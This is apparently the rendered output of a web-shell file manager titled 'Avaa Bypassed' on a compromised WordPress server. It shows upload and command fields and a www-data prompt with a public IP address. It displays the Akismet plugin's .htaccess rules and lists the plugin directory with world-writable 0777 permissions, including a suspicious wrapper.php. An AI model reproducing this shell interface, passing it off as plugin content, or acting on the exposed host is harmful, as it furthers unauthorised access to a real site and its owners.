[ Avaa Bypassed ]




Upload:

Command:

www-data@18.220.154.82: ~ $
# Only allow direct access to specific Web-available files.

# Apache 2.2
<IfModule !mod_authz_core.c>
	Order Deny,Allow
	Deny from all
</IfModule>

# Apache 2.4
<IfModule mod_authz_core.c>
	Require all denied
</IfModule>

# Akismet CSS and JS
<FilesMatch "^(form\.js|akismet(-frontend|-admin)?\.js|akismet(-admin)?(-rtl)?\.css|inter\.css)$">
	<IfModule !mod_authz_core.c>
		Allow from all
	</IfModule>
	
	<IfModule mod_authz_core.c>
		Require all granted
	</IfModule>
</FilesMatch>

# Akismet images
<FilesMatch "^(logo-(a|full)-2x\.png|akismet-refresh-logo\.svg|akismet-refresh-logo@2x\.png|arrow-left\.svg)$">
	<IfModule !mod_authz_core.c>
		Allow from all
	</IfModule>
	
	<IfModule mod_authz_core.c>
		Require all granted
	</IfModule>
</FilesMatch>

Filemanager

Name Type Size Permission Actions
_inc Folder 0777
views Folder 0777
.htaccess File 753 B 0777
LICENSE.txt File 17.67 KB 0777
akismet.php File 2.57 KB 0777
changelog.txt File 21.45 KB 0777
class.akismet-admin.php File 52.34 KB 0777
class.akismet-cli.php File 4.55 KB 0777
class.akismet-rest-api.php File 10.87 KB 0777
class.akismet-widget.php File 3.07 KB 0777
class.akismet.php File 68.91 KB 0777
index.php File 26 B 0777
readme.txt File 4.91 KB 0777
wrapper.php File 6.29 KB 0777